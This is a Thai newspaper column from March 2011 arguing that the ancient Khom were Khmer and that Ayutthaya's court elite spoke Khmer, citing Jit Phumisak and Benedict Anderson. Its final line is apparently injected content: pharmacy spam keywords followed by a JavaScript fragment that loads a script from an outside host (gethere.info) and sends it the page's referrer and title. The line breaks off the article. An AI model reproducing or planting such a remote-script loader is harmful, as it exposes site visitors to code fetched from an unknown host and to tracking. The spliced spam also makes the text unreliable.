มติชนรายวัน ฉบับประจำวันอังคารที่  15   มีนาคม  2554

คนชั้นสูงในราชสำนักกรุงศรีอยุธยา พูดภาษาเขมร เพราะเป็นพวกขอมสืบเชื้อวงศ์ละโว้กับนครวัด-นครธม

นี่เองทำให้ราชาศัพท์เต็มไปด้วยคำเขมร และวรรณคดียุคแรกๆมีคำเขมรปน          อยู่มาก

ขบวนขอมละโว้ (ลพบุรี) พูดภาษาเขมร บรรพชนคนชั้นสูงใน ราชสำนักกรุงศรีอยุธยา ภาพสลักบนระเบียงปราสาทนครวัด ราว พ.ศ. 1650

แต่บรรดาอำมาตย์ราชาชาตินิยมพากันปั้นน้ำเป็นตัวว่าขอมไม่ใช่เขมร มาตั้งแต่ก่อน พ.ศ. 2500 สืบถึงทุกวันนี้ ด้วยข้อความสรุปง่ายๆ สั้นๆว่า

ขอมสร้างปราสาทหิน เช่น นครวัด, พระวิหาร, ฯลฯ

เขมรไม่ได้สร้างปราสาทหิน เพราะเขมรไม่ใช่ขอม

ขอมกับเขมรเป็นคนละพวก ไม่เกี่ยวข้องกัน และขอมสาบสูญไปนานแล้ว เขมรเข้ามาทีหลัง

วิธีคิดแบบนี้มาจากเจ้าอาณานิคมยุโรป ที่ประกาศให้พวกเมืองขึ้นรู้ว่าผู้สร้างโบราณสถานอยู่เหนือกว่าชาวพื้นเมืองที่อยู่ใต้อาณานิคมเสมอ

ผู้สร้างโบราณสถานนั้นไม่ได้มี ‘เชื้อชาติ’ เดียวกับชาวพื้นเมืองจริงๆ (เพราะแท้จริงแล้ว ชาวพื้นเมืองเป็นผู้อพยพเข้ามาทีหลัง—)” (ชุมชนจินตกรรม ของ เบน แอนเดอร์สัน พิมพ์ครั้งแรก พ.ศ. 2552 หน้า 331)

ตรงนี้ไงล่ะที่เป็นต้นเหตุให้คนไทยต้องอพยพจากเทือกเขาอัลไต แล้วเข้ามาอยู่ใต้การปกครองของขอมที่สร้างปราสาทหิน และมอญที่สร้างสถูปเจดีย์ทวารวดี

แล้วประวัติศาสตร์แห่งชาติของไทยก็น้อมรับประกาศิตของเจ้าอาณานิคมยุโรปไว้ตั้งแต่บัดนั้นจนบัดนี้

แต่จิตร ภูมิศักดิ์ ไม่คิดอย่างอาณานิคมทางปัญญา เลยบอกว่า

“ข้าพเจ้าขอยืนยันว่า—ขอม หมายถึงชนชาติเขมรอย่างแน่ชัดมาแต่โบราณ ปรากฏหลักฐานในเอกสารทางราชการสมัยสุโขทัย, อยุธยา, และรัตนโกสินทร์”

จิตรเขียนยืนยันไว้ในหนังสือ ข้อเท็จจริงว่าด้วยชนชาติขอม (ฉบับสำนักพิมพ์มติชน พ.ศ. 2547 หน้า 147) โดยมีรายละเอียดของหลักฐานมากมายมหาศาล

พวกละโว้(ลพบุรี) ราว พ.ศ. 1650 ก็เป็นขอม พูดภาษาเขมร เป็นบรรพชน            คนชั้นสูงในราชสำนักกรุงศรีอยุธยา

fluoxetine msds valtrex tablet s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;